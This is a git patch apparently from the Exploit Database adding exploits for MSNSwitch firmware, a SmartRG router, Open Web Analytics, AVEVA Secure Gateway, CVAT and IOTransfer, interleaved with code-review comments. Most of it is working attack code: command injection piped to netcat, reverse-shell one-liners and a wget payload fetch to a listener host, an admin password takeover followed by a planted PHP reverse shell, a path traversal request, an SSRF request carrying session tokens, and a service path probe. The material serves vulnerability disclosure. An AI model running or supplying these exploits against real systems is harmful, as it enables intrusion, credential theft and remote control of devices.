From c9e53fa57b5d05510ab09ee8c8a64d9b853de570 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 12 Nov 2022 09:02:02 +0000 Subject: [PATCH] DB: 2022-11-12 7 changes to exploits/shellcodes/ghdb AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE) SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution) Open Web Analytics 1.7.3 - Remote Code Execution (RCE) CVAT 2.0 - SSRF (Server Side Request Forgery) IOTransfer V4 - Unquoted Service Path NetTransport 2.96L - Remote Buffer Overflow (DEP Bypass) Linux/MIPS (Little Endian) - system(telnetd -l /bin/sh) Shellcode (80 bytes) Linux/MIPS - reboot() Shellcode (32 bytes) Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes) Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes) Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes) --- exploits/hardware/remote/51027.py | 102 ++++++++++++ exploits/hardware/remote/51028.txt | 22 +++ exploits/hardware/remote/51031.py | 50 ++++++ exploits/php/webapps/51026.py | 247 +++++++++++++++++++++++++++++ exploits/python/webapps/51030.txt | 46 ++++++ exploits/windows/local/51029.txt | 36 +++++ exploits/windows/remote/43408.py | 2 +- files_exploits.csv | 8 +- files_shellcodes.csv | 10 +- 9 files changed, 516 insertions(+), 7 deletions(-) create mode 100755 exploits/hardware/remote/51027.py create mode 100644 exploits/hardware/remote/51028.txt create mode 100755 exploits/hardware/remote/51031.py create mode 100755 exploits/php/webapps/51026.py create mode 100644 exploits/python/webapps/51030.txt create mode 100644 exploits/windows/local/51029.txt diff --git a/exploits/hardware/remote/51027.py b/exploits/hardware/remote/51027.py new file mode 100755 index 000000000..abe1dc39a --- /dev/null +++ b/exploits/hardware/remote/51027.py 
@@ -0,0 +1,102 @@ +Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE) +Google Dork: n/a +Date:9/1/2022 +Exploit Author: Eli Fulkerson +Vendor Homepage: https://www.msnswitch.com/ +Version: MNT.2408 +Tested on: MNT.2408 firmware +CVE: CVE-2022-32429 + +#!/usr/bin/python3 + + +""" + +POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408. + +Configuration dump only requires HTTP access. +Full RCE requires you to be on the same subnet as the device. + +""" + +import requests +import sys +import urllib.parse +import readline +import random +import string + + +# listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOST +LISTENER_HOST = "192.168.EDIT.ME" +LISTENER_PORT = 3434 + +# target msnswitch +TARGET="192.168.EDIT.ME2" +PORT=80 + +USERNAME = None +PASSWORD = None + +""" +First vulnerability, unauthenticated configuration/credential dump +""" +if USERNAME == None or PASSWORD == None: + # lets just ask + hack_url=f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh" + session = requests.session() + + data = session.get(hack_url) + for each in data.text.split('\n'): + key = None + val = None + + try: + key = each.strip().split('=')[0] + val = each.strip().split('=')[1] + except: + pass + + if key == "Account1": + USERNAME = val + if key == "Password1": + PASSWORD = val + +""" +Second vulnerability, authenticated command execution + +This only works on the local lan. 
+ +for full reverse shell, modify and upload netcat busybox shell script to /tmp: + + shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f + download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmp + +ref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox +""" + +session = requests.session() + +# initial login, establishes our Cookie +burp0_url = f"http://{TARGET}:{PORT}/goform/login" +burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} +burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD} +session.post(burp0_url, headers=burp0_headers, data=burp0_data) + +# get our csrftoken +burp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp" +data = session.get(burp0_url) + +csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0] + +while True: + CMD = input('x:') + CMD_u = urllib.parse.quote_plus(CMD) + filename = ''.join(random.choice(string.ascii_letters) for _ in range(25)) + + try: + hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}" + + session.get(hack_url, timeout=0.01) + except requests.exceptions.ReadTimeout: + pass \ No newline at end of file 
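Review bot: The metadata lines at the top of the new file (`Exploit Title:` through `CVE:`) are not commented and sit above `#!/usr/bin/python3`, so the archived file does not parse as Python and the shebang is not on line 1. They should be written as comments below the shebang, as the other .py entries in this commit do (`# Exploit Title: …`). In the settings-parsing loop, the bare `except: pass` hides every error, not just a line without `=`; `except IndexError:` states the intent, and `USERNAME == None` should be `USERNAME is None`. The docstring would serve defenders better if it named the firmware release that fixes CVE-2022-32429, which this page does not give.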
diff --git a/exploits/hardware/remote/51028.txt b/exploits/hardware/remote/51028.txt
new file mode 100644
index 000000000..82ce70a0c
--- /dev/null
+++ b/exploits/hardware/remote/51028.txt
@@ -0,0 +1,22 @@
+Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
+Exploit Author: Jens Regel (CRISEC IT-Security)
+Date: 11/11/2022
+CVE: CVE-2022-23854
+Version: Access Anywhere Secure Gateway versions 2020 R2 and older
+
+Proof of Concept:
+GET
+/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
+HTTP/1.1
+
+HTTP/1.1 200 OK
+Server: EricomSecureGateway/8.4.0.26844.*
+(..)
+
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
\ No newline at end of file
diff --git a/exploits/hardware/remote/51031.py b/exploits/hardware/remote/51031.py
new file mode 100755
index 000000000..4c891edd7
--- /dev/null
+++ b/exploits/hardware/remote/51031.py
@@ -0,0 +1,50 @@ +# Exploit Title: SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution) +# Date: 13/06/2022 +# Exploit Author: Yerodin Richards +# Vendor Homepage: https://adtran.com +# Version: 2.5.15 / 2.6.13 (confirmed) +# Tested on: SR506n (2.5.15) & SR510n (2.6.13) +# CVE : CVE-2022-37661 + +import requests +from subprocess import Popen, PIPE + +router_host =3D "http://192.168.1.1" +authorization_header =3D "YWRtaW46QWRtMW5ATDFtMyM=3D" + +lhost =3D "lo" +lport =3D 80 + +payload_port =3D 81 + + +def main(): + e_proc =3D Popen(["echo", f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tm= +p/s | nc {lhost} {lport} > /tmp/s"], stdout=3DPIPE) + Popen(["nc", "-nlvp", f"{payload_port}"], stdin=3De_proc.stdout) + send_payload(f"|nc {lhost} {payload_port}|sh") + print("done.. check shell") + + +def get_session(): + url =3D router_host + "/admin/ping.html" + headers =3D {"Authorization": "Basic {}".format(authorization_header)} + r =3D requests.get(url, headers=3Dheaders).text + i =3D r.find("&sessionKey=3D") + len("&sessionKey=3D") + s =3D "" + while r[i] !=3D "'": + s =3D s + r[i] + i =3D i + 1 + return s + + +def send_payload(payload): + print(payload) + url =3D router_host + "/admin/pingHost.cmd" + headers =3D {"Authorization": "Basic {}".format(authorization_header)} + params =3D {"action": "add", "targetHostAddress": payload, "sessionKey"= +: get_session()} + requests.get(url, headers=3Dheaders, params=3Dparams).text + + +main() \ No newline at end of file diff --git a/exploits/php/webapps/51026.py b/exploits/php/webapps/51026.py new file mode 100755 index 000000000..6479af5bf --- /dev/null +++ b/exploits/php/webapps/51026.py 
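Review bot: The body of this file was committed still in MIME quoted-printable form, so the archived entry is not valid Python. Every `=` appears as `=3D`, and two statements are split by soft line breaks (`/tm=` then `p/s` in `main()`, and `"sessionKey"=` then `:` in `send_payload()`). The submission should be decoded before it is stored, so that a line reads `router_host = "http://192.168.1.1"` rather than `router_host =3D …`. Separately, `authorization_header` is a hard-coded Basic credential with no comment on where it comes from. A one-line comment saying whether it is a vendor default or a lab value would tell a reader whether this authenticated path depends on an unchanged admin password.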
@@ -0,0 +1,247 @@ +# Exploit Title: Open Web Analytics 1.7.3 - Remote Code Execution (RCE) +# Date: 2022-08-30 +# Exploit Author: Jacob Ebben +# Vendor Homepage: https://www.openwebanalytics.com/ +# Software Link: https://github.com/Open-Web-Analytics +# Version: <1.7.4 +# Tested on: Linux +# CVE : CVE-2022-24637 + +import argparse +import requests +import base64 +import re +import random +import string +import hashlib +from termcolor import colored + +def print_message(message, type): + if type == 'SUCCESS': + print('[' + colored('SUCCESS', 'green') + '] ' + message) + elif type == 'INFO': + print('[' + colored('INFO', 'blue') + '] ' + message) + elif type == 'WARNING': + print('[' + colored('WARNING', 'yellow') + '] ' + message) + elif type == 'ALERT': + print('[' + colored('ALERT', 'yellow') + '] ' + message) + elif type == 'ERROR': + print('[' + colored('ERROR', 'red') + '] ' + message) + +def get_normalized_url(url): + if url[-1] != '/': + url += '/' + if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://': + url = "http://" + url + return url + +def get_proxy_protocol(url): + if url[0:8].lower() == 'https://': + return 'https' + return 'http' + +def get_random_string(length): + chars = string.ascii_letters + string.digits + return ''.join(random.choice(chars) for i in range(length)) + +def get_cache_content(cache_raw): + regex_cache_base64 = r'\*(\w*)\*' + regex_result = re.search(regex_cache_base64, cache_raw) + if not regex_result: + print_message('The provided URL does not appear to be vulnerable ...', "ERROR") + exit() + else: + cache_base64 = regex_result.group(1) + return base64.b64decode(cache_base64).decode("ascii") + +def get_cache_username(cache): + regex_cache_username = r'"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"(\w*)"' + return re.search(regex_cache_username, cache).group(1) + +def get_cache_temppass(cache): + regex_cache_temppass = r'"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"(\w*)"' 
+ return re.search(regex_cache_temppass, cache).group(1) + +def get_update_nonce(url): + try: + update_nonce_request = session.get(url, proxies=proxies) + regex_update_nonce = r'owa_nonce" value="(\w*)"' + update_nonce = re.search(regex_update_nonce, update_nonce_request.text).group(1) + except Exception as e: + print_message('An error occurred when attempting to update config!', "ERROR") + print(e) + exit() + else: + return update_nonce + +parser = argparse.ArgumentParser(description='Exploit for CVE-2022-24637: Unauthenticated RCE in Open Web Analytics (OWA)') +parser.add_argument('TARGET', type=str, + help='Target URL (Example: http://localhost/owa/ or https://victim.xyz:8000/)') +parser.add_argument('ATTACKER_IP', type=str, + help='Address for reverse shell listener on attacking machine') +parser.add_argument('ATTACKER_PORT', type=str, + help='Port for reverse shell listener on attacking machine') +parser.add_argument('-u', '--username', default="admin", type=str, + help='The username to exploit (Default: admin)') +parser.add_argument('-p','--password', default=get_random_string(32), type=str, + help='The new password for the exploited user') +parser.add_argument('-P','--proxy', type=str, + help='HTTP proxy address (Example: http://127.0.0.1:8080/)') +parser.add_argument('-c', '--check', action='store_true', + help='Check vulnerability without exploitation') + +args = parser.parse_args() + +base_url = get_normalized_url(args.TARGET) +login_url = base_url + "index.php?owa_do=base.loginForm" +password_reset_url = base_url + "index.php?owa_do=base.usersPasswordEntry" +update_config_url = base_url + "index.php?owa_do=base.optionsGeneral" + +username = args.username +new_password = args.password + +reverse_shell = '$sock, 1=>$sock, 2=>$sock),$pipes);?>' +shell_filename = get_random_string(8) + '.php' +shell_url = base_url + 'owa-data/caches/' + shell_filename + +if args.proxy: + proxy_url = get_normalized_url(args.proxy) + proxy_protocol = 
get_proxy_protocol(proxy_url) + proxies = { proxy_protocol: proxy_url } +else: + proxies = {} + +session = requests.Session() + +try: + mainpage_request = session.get(base_url, proxies=proxies) +except Exception as e: + print_message('Could not connect to "' + base_url, "ERROR") + exit() +else: + print_message('Connected to "' + base_url + '" successfully!', "SUCCESS") + +if 'Open Web Analytics' not in mainpage_request.text: + print_message('Could not confirm whether this website is hosting OWA! Continuing exploitation...', "WARNING") +elif 'version=1.7.3' not in mainpage_request.text: + print_message('Could not confirm whether this OWA instance is vulnerable! Continuing exploitation...', "WARNING") +else: + print_message('The webserver indicates a vulnerable version!', "ALERT") + +try: + data = { + "owa_user_id": username, + "owa_password": username, + "owa_action": "base.login" + } + session.post(login_url, data=data, proxies=proxies) +except Exception as e: + print_message('An error occurred during the login attempt!', "ERROR") + print(e) + exit() +else: + print_message('Attempting to generate cache for "' + username + '" user', "INFO") + +print_message('Attempting to find cache of "' + username + '" user', "INFO") + +found = False + +for key in range(100): + user_id = 'user_id' + str(key) + userid_hash = hashlib.md5(user_id.encode()).hexdigest() + filename = userid_hash + '.php' + cache_url = base_url + "owa-data/caches/" + str(key) + "/owa_user/" + filename + cache_request = requests.get(cache_url, proxies=proxies) + if cache_request.status_code != 200: + continue; + cache_raw = cache_request.text + cache = get_cache_content(cache_raw) + cache_username = get_cache_username(cache) + if cache_username != username: + print_message('The temporary password for a different user was found. "' + cache_username + '": ' + get_cache_temppass(cache), "INFO") + continue; + else: + found = True + break +if not found: + print_message('No cache found. 
Are you sure "' + username + '" is a valid user?', "ERROR") + exit() + +cache_temppass = get_cache_temppass(cache) +print_message('Found temporary password for user "' + username + '": ' + cache_temppass, "INFO") + +if args.check: + print_message('The system appears to be vulnerable!', "ALERT") + exit() + +try: + data = { + "owa_password": new_password, + "owa_password2": new_password, + "owa_k": cache_temppass, + "owa_action": + "base.usersChangePassword" + } + session.post(password_reset_url, data=data, proxies=proxies) +except Exception as e: + print_message('An error occurred when changing the user password!', "ERROR") + print(e) + exit() +else: + print_message('Changed the password of "' + username + '" to "' + new_password + '"', "INFO") + +try: + data = { + "owa_user_id": username, + "owa_password": new_password, + "owa_action": "base.login" + } + session.post(login_url, data=data, proxies=proxies) +except Exception as e: + print_message('An error occurred during the login attempt!', "ERROR") + print(e) + exit() +else: + print_message('Logged in as "' + username + '" user', "SUCCESS") + +nonce = get_update_nonce(update_config_url) + +try: + log_location = "/var/www/html/owa/owa-data/caches/" + shell_filename + data = { + "owa_nonce": nonce, + "owa_action": "base.optionsUpdate", + "owa_config[base.error_log_file]": log_location, + "owa_config[base.error_log_level]": 2 + } + session.post(update_config_url, data=data, proxies=proxies) +except Exception as e: + print_message('An error occurred when attempting to update config!', "ERROR") + print(e) + exit() +else: + print_message('Creating log file', "INFO") + +nonce = get_update_nonce(update_config_url) + +try: + data = { + "owa_nonce": nonce, + "owa_action": "base.optionsUpdate", + "owa_config[shell]": reverse_shell + } + session.post(update_config_url, data=data, proxies=proxies) +except Exception as e: + print_message('An error occurred when attempting to update config!', "ERROR") + print(e) + exit() +else: 
+ print_message('Wrote payload to log file', "INFO") + +try: + session.get(shell_url, proxies=proxies) +except Exception as e: + print(e) +else: + print_message('Triggering payload! Check your listener!', "SUCCESS") + print_message('You can trigger the payload again at "' + shell_url + '"' , "INFO") \ No newline at end of file diff --git a/exploits/python/webapps/51030.txt b/exploits/python/webapps/51030.txt new file mode 100644 index 000000000..75778db45 --- /dev/null +++ b/exploits/python/webapps/51030.txt 
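Review bot: The `-c/--check` option is documented as "Check vulnerability without exploitation", but the `if args.check:` exit is reached only after the script has posted a login attempt, fetched the cache files and printed the recovered temporary passkey, so it is not a read-only probe. The help text should say so, for example `help='Stop before changing the password (still sends a login request and reads the user cache)'`, so that anyone running it under an authorised test knows it leaves requests in the target's logs. In `print_message(message, type)` the parameter shadows the builtin `type`; `level` would be clearer. The bare `exit()` calls rely on the `site` module, so `sys.exit(1)` is the safer choice. The script is flat and spans several hunk lines; these points apply to the argument-parser block and the helper at the top.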
@@ -0,0 +1,46 @@ +#Exploit Title: CVAT 2.0 - SSRF (Server Side Request Forgery) +#Exploit Author: Emir Polat +#Vendor Homepage: https://github.com/opencv/cvat +#Version: < 2.0.0 +#Tested On: Version 1.7.0 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64) +#CVE: CVE-2022-31188 + +# Description: +#CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability. +#Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade. + +POST /api/v1/tasks/2/data HTTP/1.1 +Host: localhost:8080 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0 +Accept: application/json, text/plain, */* +Accept-Language:en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Authorization: Token 06d88f739a10c7533991d8010761df721b790b7 +X-CSRFTOKEN:65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGV +Content-Type: multipart/form-data; boundary=-----------------------------251652214142138553464236533436 +Content-Length: 569 +Origin: http://localhost:8080 +Connection: close +Referer:http://localhost:8080/tasks/create +Cookie: csrftoken=65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGv; sessionid=dzks19fhlfan8fgq0j8j5toyrh49dned +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +-----------------------------251652214142138553464236533436 +Content-Disposition: form-data; name="remote files[0]" + +http://localhost:8081 +-----------------------------251652214142138553464236533436 +Content-Disposition: form-data; name=" image quality" + +170 +-----------------------------251652214142138553464236533436 +Content-Disposition: form-data; name="use zip chunks" + +true +-----------------------------251652214142138553464236533436 +Content-Disposition: form-data; name="use cache" + +true 
+-----------------------------251652214142138553464236533436-- \ No newline at end of file diff --git a/exploits/windows/local/51029.txt b/exploits/windows/local/51029.txt new file mode 100644 index 000000000..fd10a904e --- /dev/null +++ b/exploits/windows/local/51029.txt @@ -0,0 +1,36 @@ +# Exploit Title: IOTransfer V4 - Unquoted Service Path +# Exploit Author: BLAY ABU SAFIAN (Inveteck Global) +# Discovery Date: 2022-28-07 +# Vendor Homepage: http://www.iobit.com/en/index.php +# Software Link: https://iotransfer.itopvpn.com/download/ +# Tested Version: V4 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Microsoft Windows Server 2019 Standard Evaluation CVE-2022-37197 +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ + +IOTransfer Updater IOTUpdaterSvc C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe + Auto + +C:\>sc qc IOTUpdaterSvc +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: IOTUpdaterSvc + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe + + +LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : IOTransfer Updater + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\>systeminfo + +OS Name: Microsoft Windows Server 2019 Standard Evaluation +OS Version: 10.0.17763 N/A Build 17763 +OS Manufacturer: Microsoft Corporation \ No newline at end of file diff --git a/exploits/windows/remote/43408.py b/exploits/windows/remote/43408.py index 191eb3a48..d8ce8fce0 100755 --- a/exploits/windows/remote/43408.py +++ b/exploits/windows/remote/43408.py @@ -1,4 +1,4 @@ -#!/usr/bin/pythion +#!/usr/bin/python # Exploit Title: Buffer overflow in NetTransport Download Manager - Version 2.96L (DEP Bypass) # CVE: CVE-2017-17968 diff --git a/files_exploits.csv b/files_exploits.csv index bb25e7905..5bab5526c 100644 
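Review bot: The captured request in 51030.txt carries what look like real session values: the `Authorization: Token …` header, the `X-CSRFTOKEN` header and the `csrftoken`/`sessionid` cookies. They should be replaced with placeholders such as `Authorization: Token <API_TOKEN>` before archiving, even if they came from a throwaway local instance. The title reads "CVAT 2.0 - SSRF" while the `#Version:` line says `< 2.0.0` and the description says validation was added in 2.0.0, so the title names the fixed release as the affected one. Retitling the entry to match the version line would avoid misleading anyone who triages by title.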
--- a/files_exploits.csv +++ b/files_exploits.csv @@ -3309,6 +3309,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50569,exploits/hardware/remote/50569.txt,"Auerswald COMpact 8.0B - Multiple Backdoors",2021-12-06,"RedTeam Pentesting GmbH",remote,hardware,,2021-12-06,2022-01-05,0,CVE-2021-40859,,,,, 50567,exploits/hardware/remote/50567.txt,"Auerswald COMpact 8.0B - Privilege Escalation",2021-12-06,"RedTeam Pentesting GmbH",remote,hardware,,2021-12-06,2021-12-06,0,,,,,, 17507,exploits/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal",2011-07-08,"SecPod Research",remote,hardware,,2011-07-08,2011-07-24,1,OSVDB-73121,,,,,http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt +51028,exploits/hardware/remote/51028.txt,"AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal",2022-11-11,"Jens Regel",remote,hardware,,2022-11-11,2022-11-11,0,CVE-2022-23854,,,,, 39194,exploits/hardware/remote/39194.txt,"AVM FRITZ!Box < 6.30 - Remote Buffer Overflow",2016-01-07,"RedTeam Pentesting",remote,hardware,,2016-01-07,2016-01-07,0,OSVDB-132698,,,,,https://www.redteam-pentesting.de/advisories/rt-sa-2015-001 7845,exploits/hardware/remote/7845.txt,"AXIS 70U - Network Document Server Privilege Escalation / Cross-Site Scripting",2009-01-21,DSecRG,remote,hardware,,2009-01-20,,1,OSVDB-51658;OSVDB-51657;OSVDB-51656,,,,, 36428,exploits/hardware/remote/36428.txt,"Axis M10 Series Network Cameras - Cross-Site Scripting",2011-12-07,"Matt Metzger",remote,hardware,,2011-12-07,2015-03-19,1,CVE-2011-5261;OSVDB-77395,,,,,https://www.securityfocus.com/bid/50968/info 
@@ -3712,6 +3713,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 40734,exploits/hardware/remote/40734.sh,"MOVISTAR BHS_RTA ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,,2016-11-08,2017-11-08,0,,,,,, 44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware,,2018-04-03,2018-04-03,0,CVE-2017-14459,,,,,https://talosintelligence.com/vulnerability_reports/TALOS-2017-0507 47536,exploits/hardware/remote/47536.txt,"Moxa EDR-810 - Command Injection / Information Disclosure",2019-10-22,RandoriSec,remote,hardware,,2019-10-22,2019-10-22,0,CVE-2019-10969;CVE-2019-10963,,,,, +51027,exploits/hardware/remote/51027.py,"MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)",2022-11-11,"Eli Fulkerson",remote,hardware,,2022-11-11,2022-11-11,0,CVE-2022-32429,,,,, 39596,exploits/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,remote,hardware,,2016-03-23,2016-03-23,0,,,,,, 35317,exploits/hardware/remote/35317.txt,"Multiple Check Point Endpoint Security Products - Information Disclosure",2011-02-07,Rapid7,remote,hardware,,2011-02-07,2014-11-22,1,OSVDB-72797,,,,,https://www.securityfocus.com/bid/46224/info 48620,exploits/hardware/remote/48620.txt,"mySCADA myPRO 7 - Hardcoded Credentials",2020-06-25,"Emre ÖVÜNÇ",remote,hardware,,2020-06-25,2020-06-25,0,CVE-2018-11311,,,,, 
@@ -3821,6 +3823,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 19831,exploits/hardware/remote/19831.rb,"Siemens Simatic S7-300/400 - CPU START/STOP Module (Metasploit)",2012-07-14,"Dillon Beresford",remote,hardware,102,2012-07-14,2012-07-14,0,OSVDB-72870,"Metasploit Framework (MSF)",,,, 47083,exploits/hardware/remote/47083.py,"Siemens TIA Portal - Remote Command Execution",2019-07-10,"Joseph Bingham",remote,hardware,,2019-07-10,2020-06-18,0,,,,,, 21268,exploits/hardware/remote/21268.py,"Sitecom MD-25x - Multiple Vulnerabilities",2012-09-12,"Mattijs van Ommeren",remote,hardware,,2012-09-12,2016-12-04,0,OSVDB-85599;OSVDB-85598,,,,http://www.exploit-db.comSitecomNas.2.4.17.bin,http://www.alcyon.nl/advisories/aa-007 +51031,exploits/hardware/remote/51031.py,"SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution)",2022-11-11,"Yerodin Richards",remote,hardware,,2022-11-11,2022-11-11,0,CVE-2022-37661,,,,, 50940,exploits/hardware/remote/50940.txt,"SolarView Compact 6.0 - OS Command Injection",2022-05-17,"Ahmed Alroky",remote,hardware,,2022-05-17,2022-05-17,0,CVE-2022-29303,,,,, 50950,exploits/hardware/remote/50950.txt,"SolarView Compact 6.00 - Directory Traversal",2022-06-03,"Ahmed Alroky",remote,hardware,,2022-06-03,2022-06-03,0,CVE-2022-29298,,,,, 36205,exploits/hardware/remote/36205.txt,"SonicWALL - 'SessId' Cookie Brute Force / Admin Session Hijacking",2011-10-04,"Hugo Vazquez",remote,hardware,,2011-10-04,2019-03-28,1,OSVDB-76147,,,,,https://www.securityfocus.com/bid/49930/info 
@@ -24553,6 +24556,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 40193,exploits/php/webapps/40193.txt,"Open Upload 0.4.2 - Cross-Site Request Forgery (Add Admin)",2016-08-02,"Vinesh Redkar",webapps,php,80,2016-08-02,2016-08-02,0,,,,,http://www.exploit-db.comopenupload-0.4.2.tar.gz, 11903,exploits/php/webapps/11903.txt,"Open Web Analytics 1.2.3 - Multiple File Inclusions",2010-03-27,ITSecTeam,webapps,php,,2010-03-26,,1,OSVDB-66260;CVE-2010-2677;CVE-2010-2676;OSVDB-63288,,,,,http://www.ITSecTeam.com/en/vulnerabilities/vulnerability26.htm 31738,exploits/php/webapps/31738.py,"Open Web Analytics 1.5.4 - 'owa_email_address' SQL Injection",2014-02-18,"Dana James Traversie",webapps,php,,2014-02-18,2014-02-18,0,CVE-2014-1206;OSVDB-101925,,,,,http://www.secureworks.com/contact/terms_of_use/ +51026,exploits/php/webapps/51026.py,"Open Web Analytics 1.7.3 - Remote Code Execution (RCE)",2022-11-11,"Jacob Ebben",webapps,php,,2022-11-11,2022-11-11,0,CVE-2022-24637,,,,, 12676,exploits/php/webapps/12676.txt,"Open-AudIT - Multiple Vulnerabilities",2010-05-21,"Sébastien Duquette",webapps,php,,2010-05-20,,1,OSVDB-65175,,,,, 48516,exploits/php/webapps/48516.txt,"Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated)",2020-05-26,"Kamaljeet Kumar",webapps,php,,2020-05-26,2020-05-26,0,CVE-2020-12261,,,,, 50651,exploits/php/webapps/50651.txt,"Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated)",2022-01-10,"Dominic Clark",webapps,php,,2022-01-10,2022-01-10,0,CVE-2021-44916,,,,, 
@@ -34114,6 +34118,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 47497,exploits/python/webapps/47497.py,"Ajenti 2.1.31 - Remote Code Execution",2019-10-14,"Jeremy Brown",webapps,python,,2019-10-14,2019-10-14,0,,,,,, 48929,exploits/python/webapps/48929.py,"Ajenti 2.1.36 - Remote Code Execution (Authenticated)",2020-10-23,"Ahmet Ümit BAYRAM",webapps,python,,2020-10-23,2020-10-23,0,,,,,, 43021,exploits/python/webapps/43021.py,"Check_MK 1.2.8p25 - Information Disclosure",2017-10-18,"Julien Ahrens",webapps,python,,2017-10-20,2017-10-20,0,CVE-2017-14955,,,,http://www.exploit-db.comcheck-mk-enterprise-1.2.8p25.demo_0.stretch_amd64.deb, +51030,exploits/python/webapps/51030.txt,"CVAT 2.0 - SSRF (Server Side Request Forgery)",2022-11-11,"Emir Polat",webapps,python,,2022-11-11,2022-11-11,0,CVE-2022-31188,,,,, 47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,,2020-01-06,2020-04-13,1,CVE-2019-19844,,,,,https://ryu22e.org/en/posts/2019/12/25/django-cve-2019-19844/ 40129,exploits/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,webapps,python,80,2016-07-20,2016-07-20,1,CVE-2016-6186,,,,http://www.exploit-db.comdjango-1.10b1.tar.gz,https://www.vulnerability-lab.com/get_content.php?id=1869 50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,, 
